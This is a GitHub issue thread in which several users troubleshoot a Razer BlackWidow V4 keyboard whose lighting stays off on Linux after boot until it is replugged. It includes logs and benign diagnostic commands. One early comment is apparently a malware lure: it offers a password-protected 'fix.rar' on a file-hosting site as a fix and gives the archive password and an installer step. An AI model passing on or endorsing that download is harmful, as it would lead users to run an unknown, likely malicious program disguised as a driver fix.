openrazer/openrazer #2291: Razer BlackWidow V4 - doesn't "initialize" unless it is replugged (USB)

Swazib0y, 2024-08-26:
### Affected Device / PID

Razer BlackWidow V4 1532:0287

### Operating System / Version

Fedora 40

### Kernel Version

6.10.6-200.fc40.x86_64

### OpenRazer Version

3.8.0

### Support Checklist

- [X] My user was added to the plugdev group.
- [X] I have rebooted and the problem persists.
- [X] I looked at the [Troubleshooting](https://github.com/openrazer/openrazer/wiki/Troubleshooting) page and it did not solve the problem.

### Symptoms

- [ ] Uninstalling OpenRazer fixes the problem
- [X] Re-plugging the device fixes the problem
- [ ] It worked before a system/kernel update.
- [ ] Only a problem if the daemon is running.
- [X] Only a problem from power up or a reboot.
- [ ] I'm dual booting with Windows.
- [ ] Intermittent or erratic problem.
- [ ] My device is missing a feature.

### Please describe the issue

The device does not initialize on fresh boot and login. I have to remove the USB cable, wait a few seconds, and once I plug the USB cable back in it initializes perfectly.

By "_no initialize_" I mean, no back lighting active, all dark on the KB. Changing any backlight settings in Polychromatic has no effect, yet it detects the keyboard just fine.

Once I replug the device, PolyChromatic has no issues changing the back light config effectively.

Fresh boot dmesg
```
$ sudo dmesg | grep razer
[    6.346752] razerkbd: loading out-of-tree module taints kernel.
[    6.346763] razerkbd: module verification failed: signature and/or required key missing - tainting kernel
[    6.537597] razerkbd 0003:1532:0287.0005: input,hidraw4: USB HID v1.11 Keyboard [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input0
[    6.773550] razerkbd 0003:1532:0287.0007: input,hidraw5: USB HID v1.00 Mouse [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input2
[    6.773677] razerkbd 0003:1532:0287.0008: No inputs registered, leaving
[    6.773711] razerkbd 0003:1532:0287.0008: hidraw6: USB HID v1.00 Device [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input3
[    6.773914] razerkbd 0003:1532:0287.0009: hiddev98,hidraw7: USB HID v1.00 Device [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input4
[    6.826512] razerkbd 0003:1532:0287.0006: input,hidraw10: USB HID v1.00 Keyboard [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input1
```

Post replug dmesg
```
sudo dmesg | grep razer
[    6.346752] razerkbd: loading out-of-tree module taints kernel.
[    6.346763] razerkbd: module verification failed: signature and/or required key missing - tainting kernel
[    6.537597] razerkbd 0003:1532:0287.0005: input,hidraw4: USB HID v1.11 Keyboard [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input0
[    6.773550] razerkbd 0003:1532:0287.0007: input,hidraw5: USB HID v1.00 Mouse [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input2
[    6.773677] razerkbd 0003:1532:0287.0008: No inputs registered, leaving
[    6.773711] razerkbd 0003:1532:0287.0008: hidraw6: USB HID v1.00 Device [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input3
[    6.773914] razerkbd 0003:1532:0287.0009: hiddev98,hidraw7: USB HID v1.00 Device [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input4
[    6.826512] razerkbd 0003:1532:0287.0006: input,hidraw10: USB HID v1.00 Keyboard [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input1
[  462.317528] razerkbd 0003:1532:0287.000C: input,hidraw4: USB HID v1.11 Keyboard [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input0
[  462.375872] razerkbd 0003:1532:0287.000D: input,hidraw5: USB HID v1.00 Keyboard [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input1
[  462.441802] razerkbd 0003:1532:0287.000E: input,hidraw6: USB HID v1.00 Mouse [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input2
[  462.446834] razerkbd 0003:1532:0287.000F: No inputs registered, leaving
[  462.446911] razerkbd 0003:1532:0287.000F: hidraw7: USB HID v1.00 Device [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input3
[  462.457353] razerkbd 0003:1532:0287.0010: hiddev98,hidraw10: USB HID v1.00 Device [Razer Razer BlackWidow V4] on usb-0000:57:00.0-3/input4
```
Modules seem fine.
```
sudo dkms status
openrazer-driver/3.8.0, 6.10.4-200.fc40.x86_64, x86_64: installed
openrazer-driver/3.8.0, 6.10.5-200.fc40.x86_64, x86_64: installed
openrazer-driver/3.8.0, 6.10.6-200.fc40.x86_64, x86_64: installed
```
What am I missing? I am a .... dangerous rookie on the command line. Point me in the right direction I should be good (mostly LOL)!

AMSNX, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

lah7, 2024-08-30:
I'm not really sure if anything on OpenRazer's software side is causing this. 

* Does it happen if you enter the BIOS/UEFI setup screen (before an OS boots)? 
* Does it only happen on a cold boot (from power off) or just a reboot?
* What is the firmware version of your keyboard?
   * _(Can be found in Polychromatic → Device Info)_

Since [nobody else](https://github.com/openrazer/openrazer/issues/2163) reported this problem, it's possible there could be newer firmware that fixed this. If you can, try plugging the keyboard into a Windows computer with Razer Synapse 3 installed to check. Sometimes newer firmware can fix things like this.

RogerSelf, 2024-09-07:
I'm having this same issue and the scenario listed by OP matches my presentation of the problem.  The only difference I have to his initial setup is I am dual booting (OSes contained on two seperate SSD's)

  - No RGB unless the KB is re-plugged after the machine is booted.
  - The KB works, but there is no way to initialize the RGB / Backlighting unless you unplug it and plug it back in after the OS is running.

  - The keyboard **does** light up during post and UEFI / BIOS splash screens.  Then blacks out during OS boot.

  - (If already working) it will remain working during reboot
  - Does not work if shut down completely then booted back.

  - I've updated to the latest Razer FW for this KB.   - V1.2 in Dev Info.

  
  My Razer Grep  :
  
  [    4.663709] razerkbd 0003:1532:0287.0006: input,hidraw3: USB HID v1.11 Keyboard [Razer Razer BlackWidow V4] on usb-0000:00:14.0-3/input0
[    4.663774] razermouse 0003:1532:00B2.0004: input,hidraw5: USB HID v1.00 Mouse [Razer Razer DeathAdder V3] on usb-0000:05:00.0-1/input0
[    4.725682] razermouse 0003:1532:00B2.0007: input,hidraw4: USB HID v1.11 Keyboard [Razer Razer DeathAdder V3] on usb-0000:05:00.0-1/input2
[    4.725824] razerkbd 0003:1532:0287.000A: No inputs registered, leaving
[    4.725836] razerkbd 0003:1532:0287.000A: hidraw6: USB HID v1.00 Device [Razer Razer BlackWidow V4] on usb-0000:00:14.0-3/input3
[    4.725927] razerkbd 0003:1532:0287.000B: hiddev98,hidraw9: USB HID v1.00 Device [Razer Razer BlackWidow V4] on usb-0000:00:14.0-3/input4
[    4.909652] razermouse 0003:1532:00B2.0005: input,hidraw8: USB HID v1.00 Keyboard [Razer Razer DeathAdder V3] on usb-0000:05:00.0-1/input1
[    4.972672] razerkbd 0003:1532:0287.0009: input,hidraw7: USB HID v1.00 Mouse [Razer Razer BlackWidow V4] on usb-0000:00:14.0-3/input2
[    5.024681] razerkbd 0003:1532:0287.0008: input,hidraw14: USB HID v1.00 Keyboard [Razer Razer BlackWidow V4] on usb-0000:00:14.0-3/input1

DKMS Status:

openrazer-driver/3.8.0, 6.10.7-200.fsync.fc40.x86_64, x86_64: installed

RogerSelf, 2024-09-13:
Recent updates seem to have addressed this issue.  

Fixed

Swazib0y, 2024-09-16:
Apologies for the slow responses.

To address the questions:

> * Does it happen if you enter the BIOS/UEFI setup screen (before an OS boots)?
Not sure what you mean. However, on a cold boot/restart the keyboard does the usual flash sequence and lights up just fine. Also in Windows (I dual boot) it works just fine.
 
> * Does it only happen on a cold boot (from power off) or just a reboot?
Any reboot - cold, warm, or otherwise - the keyboard does not light up.

> * What is the firmware version of your keyboard?
>   * _(Can be found in Polychromatic → Device Info)_

V1.2 (which was latest at time of creating initial issue.

> Recent updates seem to have addressed this issue.
> 
> Fixed

I am still having the issue, and have all the latest updates I believe.

Swazib0y, 2024-09-16:
Reading comment from RogerSelf, we seen to have dual boot in common...

> I'm having this same issue and the scenario listed by OP matches my presentation of the problem. The only difference I have to his initial setup is I am dual booting (OSes contained on two seperate SSD's)

RogerSelf, 2024-09-24:
Just wanted to add some more context here.

This seems to be some issue between Kernel Updates and the subsequent Mesa / Freedesktop Platform updates.

As I stated before, this started working after some system updates.  
Later there was a kernel update and it stopped working again, and today after I upgraded Mesa and Freedesktop Platform updates, it began working as expected again.

I'm not versed enough to shed any more light than this, but I thought I might point it out just in case it helps lead in the right direction.

Thanks,

RS

lah7, 2024-11-21:
From what I gather, is booting into Linux **always** causing no backlight until replugged?

If that's not the case, please could you describe what boot order works/stops working? e.g.

> * _Power off_ → Linux = No lights
> * _Power off_ → Windows = Works
> * Windows → Linux = Works if already working
> * Linux → _Shutdown_ → Linux = Stops working
> * Linux → Linux = etc.....

To rule out hardware/firmware or software (driver/Windows), does the lighting work if OpenRazer is uninstalled? To try that, either:

* Uninstall driver, shut down, replug (to fully power cycle keyboard) and see if rebooting Linux to Linux works, and Windows to Linux - when is the buggy behaviour triggered?
* Or, as above, but use a Linux live session (CD/USB, e.g. Ubuntu install media) to not touch your Linux installation.
   * _Without OpenRazer, the kernel will use a generic USB driver._
   * _Also, depending on the age of your live USB/CD, live sessions may be running older kernels._

Need to know if OpenRazer is responsible for the problem, since it's unclear what's happening. @RogerSelf's comment suggests system updates 'fixes' it, which would imply it's a bug in the Linux kernel -- possibly better handling a quirky BIOS or USB hub. On the other hand, it could the Razer firmware being stuck in a bugged state _(out of our control),_ especially since it appears to happen after the BIOS/UEFI screen, but as soon as Linux starts booting ("loading initial ramdisk..." stuff).

---

Just to note, when `openrazer-daemon` starts (after login), it tells the device to enter ["driver mode"](https://github.com/openrazer/openrazer/wiki/Using-the-keyboard-driver#device_mode---set-device-mode). Windows with Synapse typically sets this too. You could see if setting it back to "generic mode" before you reboot helps?

    openrazer-daemon -s
    echo -n -e "\x00\x00" > /sys/module/razerkbd/drivers/hid\:razerkbd/*1532:0287*/device_mode

If you want to mess the other way, `\x03\x00` puts it back to driver mode:

    echo -n -e "\x03\x00" > /sys/module/razerkbd/drivers/hid\:razerkbd/*1532:0287*/device_mode

---

Out of curiosity, when it's stuck with no lights off, does manually sending a "USB reset" command do the same as replugging?

    sudo usbreset 1532:0287

(If not `usbreset` is not installed, it's in the `usbutils` package on Arch/Ubuntu)

---

Finally, because modern BIOS/UEFIs seem buggy these days, are there any BIOS updates for the machine? Are you using desktop motherboards or laptops? Are there any other USB ports to try (especially USB 2.0 vs 3.0)?

Just trying to extract more details for troubleshooting to better understand the cause!

HarlemSquirrel, 2024-12-08:
I tried the USB reset and it didn't help.

OS: Arch Linux x86_64
Host: MS-7C37 (1.0)
Kernel: Linux 6.12.3-arch1-1
Uptime: 2 mins
Packages: 2104 (pacman), 19 (flatpak)
Shell: zsh 5.9
Display (G321CQP E2): 2560x1440 @ 165 Hz in 32" [External]
DE: KDE Plasma 6.2.4
WM: KWin (Wayland)
WM Theme: Breeze
Theme: Breeze (Dark) [Qt], Breeze-Dark [GTK2], Breeze [GTK3]
Icons: breeze-dark [Qt], breeze-dark [GTK2/3/4]
Font: Noto Sans (10pt) [Qt], Noto Sans (10pt) [GTK2/3/4]
Cursor: breeze (24px)
Terminal: konsole 24.8.3
CPU: AMD Ryzen 7 3800X (16) @ 4.56 GHz
GPU: AMD Radeon RX 7900 XTX [Discrete]
Memory: 3.03 GiB / 15.54 GiB (19%)
Swap: 20.50 MiB / 15.09 GiB (0%)
Polychromatic 0.9.3
Python: 3.12.7

HarlemSquirrel, 2024-12-08:
<details>
<summary>
Here's the logs
</summary>

```
Dec 08 11:34:05 lh-ryzen-desktop razer_mount[509]: Driver razerkbd
Dec 08 11:34:05 lh-ryzen-desktop razer_mount[511]: Driver razermouse
Dec 08 11:34:05 lh-ryzen-desktop razer_mount[512]: Device_ID 5-3
Dec 08 11:34:05 lh-ryzen-desktop razer_mount[513]: Device_ID 1-5
Dec 08 11:34:05 lh-ryzen-desktop razer_mount[515]: Modprobing razermouse
Dec 08 11:34:05 lh-ryzen-desktop razer_mount[514]: Modprobing razerkbd
Dec 08 11:34:05 lh-ryzen-desktop kernel: razerkbd: loading out-of-tree module taints kernel.
Dec 08 11:34:05 lh-ryzen-desktop kernel: razerkbd: module verification failed: signature and/or required key missing - tainting kernel
Dec 08 11:34:05 lh-ryzen-desktop kernel: razerkbd 0003:1532:0287.0006: input,hidraw1: USB HID v1.11 Keyboard [Razer Razer BlackWidow V4] on usb-0000:31:00.3-3/input0
Dec 08 11:34:05 lh-ryzen-desktop kernel: razermouse 0003:1532:005C.0002: input,hidraw6: USB HID v1.11 Mouse [Razer Razer DeathAdder Elite] on usb-0000:2a:00.1-5/input0
Dec 08 11:34:06 lh-ryzen-desktop kernel: razermouse 0003:1532:005C.0003: input,hidraw2: USB HID v1.11 Keyboard [Razer Razer DeathAdder Elite] on usb-0000:2a:00.1-5/input1
Dec 08 11:34:06 lh-ryzen-desktop kernel: razerkbd 0003:1532:0287.0009: input,hidraw8: USB HID v1.00 Keyboard [Razer Razer BlackWidow V4] on usb-0000:31:00.3-3/input1
Dec 08 11:34:06 lh-ryzen-desktop kernel: razermouse 0003:1532:005C.0004: input,hidraw3: USB HID v1.11 Keyboard [Razer Razer DeathAdder Elite] on usb-0000:2a:00.1-5/input2
Dec 08 11:34:06 lh-ryzen-desktop kernel: razerkbd 0003:1532:0287.000B: No inputs registered, leaving
Dec 08 11:34:06 lh-ryzen-desktop kernel: razerkbd 0003:1532:0287.000B: hidraw9: USB HID v1.00 Device [Razer Razer BlackWidow V4] on usb-0000:31:00.3-3/input3
Dec 08 11:34:06 lh-ryzen-desktop kernel: razerkbd 0003:1532:0287.000C: hiddev98,hidraw10: USB HID v1.00 Device [Razer Razer BlackWidow V4] on usb-0000:31:00.3-3/input4
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[769]: Modprobed razermouse
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[776]: Driver razermouse
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[775]: Driver razermouse
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[777]: Driver razermouse
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[778]: Device_ID 1-5:1.2
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[779]: Device_ID 1-5:1.0
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[780]: Device_ID 1-5:1.1
Dec 08 11:34:06 lh-ryzen-desktop kernel: razerkbd 0003:1532:0287.000A: input,hidraw11: USB HID v1.00 Mouse [Razer Razer BlackWidow V4] on usb-0000:31:00.3-3/input2
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[784]: Driver razermouse
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[785]: Driver razermouse
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[786]: Driver razermouse
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[787]: Device_ID 0003:1532:005C.0003
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[788]: Device_ID 0003:1532:005C.0004
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[789]: Device_ID 0003:1532:005C.0002
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[790]: Changing group /sys/bus/hid/drivers/razermouse/0003:1532:005C.0003/
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[791]: Changing group /sys/bus/hid/drivers/razermouse/0003:1532:005C.0004/
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[792]: Changing group /sys/bus/hid/drivers/razermouse/0003:1532:005C.0002/
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[797]: Changed group /sys/bus/hid/drivers/razermouse/0003:1532:005C.0002/
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[796]: Changed group /sys/bus/hid/drivers/razermouse/0003:1532:005C.0003/
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[798]: Changed group /sys/bus/hid/drivers/razermouse/0003:1532:005C.0004/
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[814]: Modprobed razerkbd
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[823]: Driver razerkbd
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[822]: Driver razerkbd
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[824]: Driver razerkbd
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[825]: Driver razerkbd
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[826]: Driver razerkbd
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[830]: Device_ID 5-3:1.3
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[831]: Device_ID 5-3:1.0
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[829]: Device_ID 5-3:1.1
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[833]: Device_ID 5-3:1.4
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[835]: Device_ID 5-3:1.2
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[842]: Driver razerkbd
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[843]: Driver razerkbd
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[844]: Driver razerkbd
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[845]: Driver razerkbd
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[847]: Device_ID 0003:1532:0287.000B
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[846]: Device_ID 0003:1532:0287.0009
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[849]: Driver razerkbd
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[848]: Device_ID 0003:1532:0287.0006
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[850]: Device_ID 0003:1532:0287.000C
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[852]: Changing group /sys/bus/hid/drivers/razerkbd/0003:1532:0287.000B/
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[851]: Device_ID 0003:1532:0287.000A
Dec 08 11:34:06 lh-ryzen-desktop razer_mount[853]: Changing group /sys/bus/hid/drivers/razerkbd/0003:1532:0287.0009/
[... cut ...]
Dec 08 11:35:26 lh-ryzen-desktop openrazer-daemon[2777]: 2024-12-08 11:35:26 | razer                          | INFO     | Found valid device.1: 0003:1532:0287.000F
Dec 08 11:35:26 lh-ryzen-desktop openrazer-daemon[2777]: 2024-12-08 11:35:26 | razer.device1                  | INFO     | Initialising device.1 RazerBlackWidowV4
Dec 08 11:35:26 lh-ryzen-desktop openrazer-daemon[2777]: 2024-12-08 11:35:26 | razer.device1                  | INFO     | Putting device into driver mode. Daemon will handle special functionality
```

</details>

ZolaKluke, 2025-01-13:
Can confirm I'm also having the same issue with the same keyboard however it worked fine for a few months before suddenly having the same symptoms as other users in the last 3-4 weeks

ZolaKluke, 2025-01-20:
Update: In the last few days the keyboard is behaving normally again

HarlemSquirrel, 2025-01-24:
> Update: In the last few days the keyboard is behaving normally again

I updated today and still have the same issue so it's not resolved for me.

HarlemSquirrel, 2025-02-02:
So I have firmware v1.3 and attempting to update the firmware following [this article](https://mysupport.razer.com/app/answers/detail/a_id/13901/~/razer-blackwidow-v4-firmware-updater-%7C-rz03-0469)  to what is says is  v1.02.00_r1 as the latest just says I have the latest firmware and doesn't give an option to reinstall.

I'm wondering if v1.3 is where the issue is and it was pulled down or something since I can't find that version anywhere.

HarlemSquirrel, 2025-02-05:
Well now I just updated and restarted twice in a row and it seems to be OK now 🤨

lah7, 2025-02-05:
It'll be good to know which system package(s) are causing this. Mind if anyone shares the update log for that day, if/when it happens? e.g.

* Arch: `/var/log/pacman.log`
* Debian/Ubuntu: `/var/log/apt/history.log`

HarlemSquirrel, 2025-02-08:
These stand out as possible culprits to me:
- dkms
- usbredir

<details>
<summary>
Here's what got updated
</summary>

<pre>
❯ grep '2025-02-02' /var/log/pacman.log | grep upgraded
[2025-02-02T12:02:34-0500] [ALPM] upgraded archlinux-appstream-data (20241214-1 -> 20250202-1)
[2025-02-02T12:02:34-0500] [ALPM] upgraded qt6-translations (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:35-0500] [ALPM] upgraded qt6-base (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:35-0500] [ALPM] upgraded python-pyqt6 (6.8.0-2 -> 6.8.0-3)
[2025-02-02T12:02:35-0500] [ALPM] upgraded qt6-imageformats (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:36-0500] [ALPM] upgraded qt6-declarative (6.8.1-3 -> 6.8.2-1)
[2025-02-02T12:02:36-0500] [ALPM] upgraded qt6-multimedia-ffmpeg (6.8.1-2 -> 6.8.2-1)
[2025-02-02T12:02:36-0500] [ALPM] upgraded qt6-multimedia (6.8.1-2 -> 6.8.2-1)
[2025-02-02T12:02:36-0500] [ALPM] upgraded qt6-speech (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:36-0500] [ALPM] upgraded qt6-svg (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:36-0500] [ALPM] upgraded qt6-positioning (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:36-0500] [ALPM] upgraded qt6-webchannel (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:36-0500] [ALPM] upgraded noto-fonts (1:2025.01.01-1 -> 1:2025.02.01-1)
[2025-02-02T12:02:37-0500] [ALPM] upgraded qt6-webengine (6.8.1-2 -> 6.8.2-1)
[2025-02-02T12:02:37-0500] [ALPM] upgraded python-jaconv (0.3.4-2 -> 0.3.4-3)
[2025-02-02T12:02:37-0500] [ALPM] upgraded calibre (7.24.0-1 -> 7.24.0-2)
[2025-02-02T12:02:38-0500] [ALPM] upgraded chromium (132.0.6834.159-1 -> 133.0.6943.35-1)
[2025-02-02T12:02:38-0500] [ALPM] upgraded dkms (3.1.4-1 -> 3.1.5-1)
[2025-02-02T12:02:38-0500] [ALPM] upgraded gstreamer (1.24.11-2 -> 1.24.12-1)
[2025-02-02T12:02:38-0500] [ALPM] upgraded gst-plugins-base-libs (1.24.11-2 -> 1.24.12-1)
[2025-02-02T12:02:38-0500] [ALPM] upgraded gst-plugins-bad-libs (1.24.11-2 -> 1.24.12-1)
[2025-02-02T12:02:38-0500] [ALPM] upgraded libadwaita (1:1.6.3-1 -> 1:1.6.4-1)
[2025-02-02T12:02:38-0500] [ALPM] upgraded epiphany (47.2-1 -> 47.3.1-1)
[2025-02-02T12:02:38-0500] [ALPM] upgraded github-cli (2.66.0-1 -> 2.66.1-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded gnome-system-monitor (47.0-3 -> 47.1-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded graphviz (12.1.2-2 -> 12.2.1-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded gst-devtools-libs (1.24.11-2 -> 1.24.12-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded gst-python (1.24.11-2 -> 1.24.12-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded gst-editing-services (1.24.11-2 -> 1.24.12-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded gst-libav (1.24.11-2 -> 1.24.12-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded gst-plugin-gtk (1.24.11-2 -> 1.24.12-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded liblc3 (1.1.1-1 -> 1.1.2-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded gst-plugins-bad (1.24.11-2 -> 1.24.12-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded gst-plugins-base (1.24.11-2 -> 1.24.12-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded gst-plugins-good (1.24.11-2 -> 1.24.12-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded qt6-shadertools (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded qt6-5compat (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded qt6-sensors (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded qt6-tools (6.8.1-2 -> 6.8.2-2)
[2025-02-02T12:02:39-0500] [ALPM] upgraded qt6-wayland (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:39-0500] [ALPM] upgraded layer-shell-qt (6.2.5-1 -> 6.2.5-3)
[2025-02-02T12:02:39-0500] [ALPM] upgraded kwin (6.2.5-1 -> 6.2.5-3)
[2025-02-02T12:02:40-0500] [ALPM] upgraded luajit (2.1.1731601260-1 -> 2.1.1736781742-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded npm (11.0.0-1 -> 11.1.0-2)
[2025-02-02T12:02:40-0500] [ALPM] upgraded obsidian (1.8.3-1 -> 1.8.4-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded pacman-contrib (1.10.6-2 -> 1.11.0-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded python-hypothesis (6.123.13-1 -> 6.124.7-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded python-pydantic-core (1:2.28.0-1 -> 2:2.27.2-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded python-python-socks (2.6.1-1 -> 2.7.0-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded qt5-tools (5.15.16+kde+r3-4 -> 5.15.16+kde+r3-6)
[2025-02-02T12:02:40-0500] [ALPM] upgraded qt6-charts (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded qt6-connectivity (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded qt6-location (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded qt6-networkauth (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded qt6-quicktimeline (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded qt6-quick3d (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded qt6-virtualkeyboard (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded qt6-websockets (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:40-0500] [ALPM] upgraded qt6-webview (6.8.1-1 -> 6.8.2-1)
[2025-02-02T12:02:41-0500] [ALPM] upgraded thunderbird (128.5.2-2 -> 128.6.0-1)
[2025-02-02T12:02:41-0500] [ALPM] upgraded usbredir (0.14.0-1 -> 0.15.0-1)
[2025-02-02T12:02:41-0500] [ALPM] upgraded vim-runtime (9.1.1055-1 -> 9.1.1065-1)
[2025-02-02T12:02:41-0500] [ALPM] upgraded vim (9.1.1055-1 -> 9.1.1065-1)
[2025-02-02T12:02:41-0500] [ALPM] upgraded zenity (4.0.3-1 -> 4.0.5-1)
[2025-02-02T12:02:41-0500] [ALPM] upgraded zlib-ng (2.2.3-1 -> 2.2.3-2)
[2025-02-02T12:08:27-0500] [ALPM] upgraded mozillavpn (2.24.3-1 -> 2.25.0-1)
</pre>
</details>

jeg0, 2025-02-23:
I am also having this exact issue. I will see if I can get an update log after next boot.

lah7, 2025-03-16:
We still don't know what's causing this issue, we don't have this keyboard to test. From what I gather, it _seems_ external to OpenRazer; only happens after certain updates then resolves itself, or if rebooting from Windows. The keyboard typing works, and it's just the lighting that's stuck "off"?

* Are we using KVM switches? (This was [recently discovered](https://github.com/openrazer/openrazer/issues/2410) to be causing USB issues.) 
* Does it happen in other ports (USB 2.0 vs USB 3.0 ports)?

Has anyone tried the "driver" mode vs "normal" mode theory?<sup>[[Comment earlier]](https://github.com/openrazer/openrazer/issues/2291#issuecomment-2491279894)</sup> Does telling the keyboard to change modes 'fix' the behaviour without needing a replug?

To put it in **normal mode** - run this after `openrazer-daemon` has started:

    echo -n -e "\x00\x00" > /sys/module/razerkbd/drivers/hid\:razerkbd/*1532:0287*/device_mode

Then try changing lighting options - any difference?

To put it back in **driver mode** - starting `openrazer-daemon` will also do this:

    echo -n -e "\x03\x00" > /sys/module/razerkbd/drivers/hid\:razerkbd/*1532:0287*/device_mode

Just wondering because the keyboard starts off in "normal" mode (after a power cycle) then proceeds to "driver" mode by Razer Synapse or OpenRazer. So, I'd just like to confirm whether the lighting isn't happy due to being in the wrong mode, or if the firmware becomes buggy after being told to enter "driver" mode twice, or something?

To print the current mode - it'll be a `0000` (normal) or `0003` (driver).

    hexdump /sys/module/razerkbd/drivers/hid\:razerkbd/*1532:0287*/device_mode

Also, we could check if uninstalling OpenRazer makes any difference? If it still happens, it's certainly a Linux-specific bug, but not caused by this driver.

HarlemSquirrel, 2025-04-01:
OK so I've having the issue again. I just booted up and the keyboard is dark.

This I think shows it started in driver mode.

```
❯ hexdump /sys/module/razerkbd/drivers/hid\:razerkbd/*1532:0287*/device_mode
0000000 0003                                   
0000002
```

Setting to normal mode and back to driver mode appears to have no effect. Unplugging and plugging back in gets the LEDs to do their rainbow initialization and then loads the last static color I set.

tda0626, 2025-07-20:
I am experiencing this issue too with a Death Basilisk v3 mouse. It happens sometimes when booting.

OS CachyOS
Kernel 6.15.7-2
Openrazer 3.10.3

```
❯ sudo dmesg | grep razer
[sudo] password for tim: 
[    8.962293] razermouse 0003:1532:0099.0001: input,hidraw0: USB HID v1.11 Mouse [Razer Razer Basilisk V3] on usb-0000:0c:00.3-3.1/input0
[    9.081432] razermouse 0003:1532:0099.0002: input,hidraw1: USB HID v1.11 Keyboard [Razer Razer Basilisk V3] on usb-0000:0c:00.3-3.1/input1
[    9.291346] razermouse 0003:1532:0099.0003: input,hidraw3: USB HID v1.11 Keyboard [Razer Razer Basilisk V3] on usb-0000:0c:00.3-3.1/input2
[    9.291479] razermouse 0003:1532:0099.0005: No inputs registered, leaving
